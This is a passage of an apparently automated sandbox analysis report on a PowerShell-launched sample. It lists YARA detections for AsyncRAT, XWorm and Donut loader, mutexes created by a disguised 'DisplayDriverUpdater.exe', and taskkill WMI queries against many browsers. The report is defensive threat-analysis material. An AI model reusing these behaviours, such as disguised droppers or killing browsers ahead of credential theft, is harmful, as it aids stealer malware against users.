Source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000033.00000002.1811615016.000002B200C5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io |
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000033.00000002.2579212650.000002B268D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000033.00000002.1811615016.000002B200C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147 |
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147 |
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147 |
Source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147 |
Source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000033.00000002.1811615016.000002B200C5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147 |
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000033.00000002.2579212650.000002B268D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000033.00000002.1811615016.000002B200C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_03 |
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7512:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\3575659c-bb47-448e-a514-22865732bbc |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1056:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\6lFXjUqCtT3P20q9 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_03 |
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe | Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-508009730 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe") |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe") |
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe") |
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe") |